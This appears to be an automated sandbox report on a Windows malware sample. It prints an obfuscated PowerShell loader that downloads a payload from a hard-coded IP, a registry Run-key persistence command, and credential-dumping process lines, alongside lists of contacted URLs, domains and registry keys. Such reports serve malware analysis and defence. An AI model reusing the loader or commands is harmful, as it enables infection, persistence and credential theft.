(Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant
(Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa
tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp
xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl
Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$
,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash
uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc
ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg
VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime-
PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset
');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh
Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv
ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet
Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals
' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres
Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers:
Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr
aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab
Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis
RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver)
,oate ');Ordonnant $Euryaleae;"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function
Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt
$Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function
Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge
Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro
CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0
Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er
Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr
rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/
esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg
CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals
'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft
Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio
nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl
Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4
ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden
ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe
Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend
Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide
Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb
ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn
GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri
Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice
ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr)
Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst
mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd
ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i
n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu
eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve
V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals
'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean
BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir
in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant
(Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets
nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag
SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals
'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr
Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant
(Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant
(Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa
tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp
xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl
Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$
,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash
uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc
ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg
VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime-
PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset
');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh
Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv
ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet
Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals
' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres
Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers:
Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr
aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab
Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis
RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver)
,oate ');Ordonnant $Euryaleae;"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ
/d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty
-Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
|
There are 3 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
|
unknown
|
||
http://www.certplus.com/CRL/class3.crl0
|
unknown
|
||
http://www.e-me.lv/repository0
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://www.acabogacia.org/doc0
|
unknown
|
||
http://crl.chambersign.org/chambersroot.crl0
|
unknown
|
||
http://ocsp.suscerte.gob.ve0
|
unknown
|
||
https://go.microsoft.co
|
unknown
|
||
http://www.imvu.comta
|
unknown
|
||
http://www.postsignum.cz/crl/psrootqca2.crl02
|
unknown
|
||
http://crl.dhimyotis.com/certignarootca.crl0
|
unknown
|
||
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
|
unknown
|
||
http://87.121.105.184
|
unknown
|
||
http://www.chambersign.org1
|
unknown
|
||
http://www.pkioverheid.nl/policies/root-policy0
|
unknown
|
||
http://repository.swisssign.com/0
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
http://www.suscerte.gob.ve/lcr0#
|
unknown
|
||
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
|
unknown
|
||
http://crl.ssc.lt/root-c/cacrl.crl0
|
unknown
|
||
http://postsignum.ttc.cz/crl/psrootqca2.crl0
|
unknown
|
||
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
|
unknown
|
||
http://ca.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
|
unknown
|
||
http://www.certplus.com/CRL/class3P.crl0
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://www.suscerte.gob.ve/dpc0
|
unknown
|
||
http://www.certeurope.fr/reference/root2.crl0
|
unknown
|
||
http://www.certplus.com/CRL/class2.crl0
|
unknown
|
||
http://www.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.defence.gov.au/pki0
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://www.sk.ee/cps/0
|
unknown
|
||
http://www.globaltrust.info0=
|
unknown
|
||
http://www.anf.es
|
unknown
|
||
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://crl.postsignum.cz/crl/psrootqca4.crl02
|
unknown
|
||
http://pki.registradores.org/normativa/index.htm0
|
unknown
|
||
http://policy.camerfirma.com0
|
unknown
|
||
http://www.ssc.lt/cps03
|
unknown
|
||
http://ocsp.pki.gva.es0
|
unknown
|
||
http://www.anf.es/es/address-direccion.html
|
unknown
|
||
https://www.anf.es/address/)1(0&
|
unknown
|
||
http://87.121.105.184/Udvejningernes.aaf
|
87.121.105.184
|
||
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
|
unknown
|
||
http://ca.mtin.es/mtin/ocsp0
|
unknown
|
||
http://crl.ssc.lt/root-b/cacrl.crl0
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
|
unknown
|
||
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
|
unknown
|
||
http://www.certicamara.com/dpc/0Z
|
unknown
|
||
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://wwww.certigna.fr/autorites/0m
|
unknown
|
||
http://www.dnie.es/dpc0
|
unknown
|
||
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://87.121.105.184/sviLEH127.bin
|
87.121.105.184
|
||
http://ca.mtin.es/mtin/DPCyPoliticas0
|
unknown
|
||
https://www.anf.es/AC/ANFServerCA.crl0
|
unknown
|
||
https://repository.tsp.zetes.com0
|
unknown
|
||
http://www.globaltrust.info0
|
unknown
|
||
http://certificates.starfieldtech.com/repository/1604
|
unknown
|
||
http://acedicom.edicomgroup.com/doc0
|
unknown
|
||
http://www.certplus.com/CRL/class3TS.crl0
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://crl.anf.es/AC/ANFServerCA.crl0
|
unknown
|
||
http://www.certeurope.fr/reference/pc-root2.pdf0
|
unknown
|
||
http://ac.economia.gob.mx/last.crl0G
|
unknown
|
||
https://www.catcert.net/verarrel
|
unknown
|
||
http://www.disig.sk/ca0f
|
unknown
|
||
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
|
unknown
|
||
http://www.e-szigno.hu/RootCA.crl
|
unknown
|
||
http://www.sk.ee/juur/crl/0
|
unknown
|
||
http://crl.chambersign.org/chambersignroot.crl0
|
unknown
|
||
http://crl.xrampsecurity.com/XGCA.crl0
|
unknown
|
||
http://certs.oati.net/repository/OATICA2.crl0
|
unknown
|
||
http://crl.oces.trust2408.com/oces.crl0
|
unknown
|
||
http://www.quovadis.bm0
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
http://crl.ssc.lt/root-a/cacrl.crl0
|
unknown
|
||
http://certs.oaticerts.com/repository/OATICA2.crl
|
unknown
|
||
http://certs.oati.net/repository/OATICA2.crt0
|
unknown
|
||
http://www.accv.es00
|
unknown
|
||
http://www.pkioverheid.nl/policies/root-policy-G20
|
unknown
|
||
https://www.netlock.net/docs
|
unknown
|
||
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
|
unknown
|
||
http://www.e-trust.be/CPS/QNcerts
|
unknown
|
||
http://ocsp.ncdc.gov.sa0
|
unknown
|
||
http://fedir.comsign.co.il/crl/ComSignCA.crl0
|
unknown
|
||
http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
|
unknown
|
||
http://crl2.postsignum.cz/crl/psrootqca4.crl01
|
unknown
|
||
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
|
unknown
|
||
http://web.ncdc.gov.sa/crl/nrcaparta1.crl
|
unknown
|
||
http://www.datev.de/zertifikat-policy-int0
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
paygateme.net
|
146.70.57.34
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
87.121.105.184
|
unknown
|
Bulgaria
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
146.70.57.34
|
paygateme.net
|
United Kingdom
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\Sortiment
|
Anadems
|
||
HKEY_CURRENT_USER\Environment
|
Piptadenia
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
|
time
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Nuchale
|
There are 10 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
6604000
|
heap
|
page read and write
|
||
A8C3000
|
direct allocation
|
page execute and read and write
|
||
9450000
|
direct allocation
|
page execute and read and write
|
||
2B7B8242000
|
trusted library allocation
|
page read and write
|
||
5A73000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
1ABE88BD000
|
heap
|
page read and write
|
||
4DE000
|
stack
|
page read and write
|
||
73E0000
|
trusted library allocation
|
page read and write
|
||
2B7AA18A000
|
trusted library allocation
|
page read and write
|
||
A40000
|
trusted library allocation
|
page read and write
|
||
22585000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
6BFE000
|
stack
|
page read and write
|
||
7450000
|
trusted library allocation
|
page read and write
|
||
2B7A6640000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
1ABE8877000
|
heap
|
page read and write
|
||
730E000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1ABE86F2000
|
heap
|
page read and write
|
||
C70000
|
heap
|
page execute and read and write
|
||
2B7C06CC000
|
heap
|
page read and write
|
||
A0D000
|
heap
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
A01000
|
heap
|
page read and write
|
||
2B7A87F6000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
9070000
|
heap
|
page read and write
|
||
6624000
|
heap
|
page read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
A44000
|
trusted library allocation
|
page read and write
|
||
2B7A6770000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
226E8000
|
heap
|
page read and write
|
||
70C9000
|
heap
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
2B7C07F0000
|
heap
|
page read and write
|
||
4888000
|
heap
|
page read and write
|
||
1ABE6A1B000
|
heap
|
page read and write
|
||
1ABE88C1000
|
heap
|
page read and write
|
||
1ABE8706000
|
heap
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
1ABE870E000
|
heap
|
page read and write
|
||
AA1000
|
heap
|
page read and write
|
||
1ABE88B5000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
2B7A81D1000
|
trusted library allocation
|
page read and write
|
||
2B7A8C6C000
|
trusted library allocation
|
page read and write
|
||
2B7A8CE9000
|
trusted library allocation
|
page read and write
|
||
9033000
|
heap
|
page read and write
|
||
A1D000
|
heap
|
page read and write
|
||
7360000
|
trusted library allocation
|
page execute and read and write
|
||
A97000
|
heap
|
page read and write
|
||
930B000
|
stack
|
page read and write
|
||
22571000
|
heap
|
page read and write
|
||
7230000
|
heap
|
page execute and read and write
|
||
1ABE889F000
|
heap
|
page read and write
|
||
662C000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
6624000
|
heap
|
page read and write
|
||
23816000
|
heap
|
page read and write
|
||
4E8000
|
heap
|
page read and write
|
||
2DCF000
|
stack
|
page read and write
|
||
CC3B07C000
|
stack
|
page read and write
|
||
2C00000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
61C3DFF000
|
stack
|
page read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
1ABE67CC000
|
heap
|
page read and write
|
||
1ABE88AC000
|
heap
|
page read and write
|
||
1ABE88CB000
|
heap
|
page read and write
|
||
2F40000
|
heap
|
page read and write
|
||
4760000
|
heap
|
page read and write
|
||
4888000
|
heap
|
page read and write
|
||
2B7C06EA000
|
heap
|
page read and write
|
||
1ABE895B000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
7220000
|
trusted library allocation
|
page read and write
|
||
1ABE87E0000
|
heap
|
page read and write
|
||
1ABE67A0000
|
heap
|
page read and write
|
||
1ABE8880000
|
heap
|
page read and write
|
||
1ABE86EA000
|
heap
|
page read and write
|
||
1ABE8739000
|
heap
|
page read and write
|
||
4A80000
|
trusted library allocation
|
page read and write
|
||
47B0000
|
heap
|
page read and write
|
||
6621000
|
heap
|
page read and write
|
||
2B7A9E03000
|
trusted library allocation
|
page read and write
|
||
2B7A8729000
|
trusted library allocation
|
page read and write
|
||
9490000
|
direct allocation
|
page read and write
|
||
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
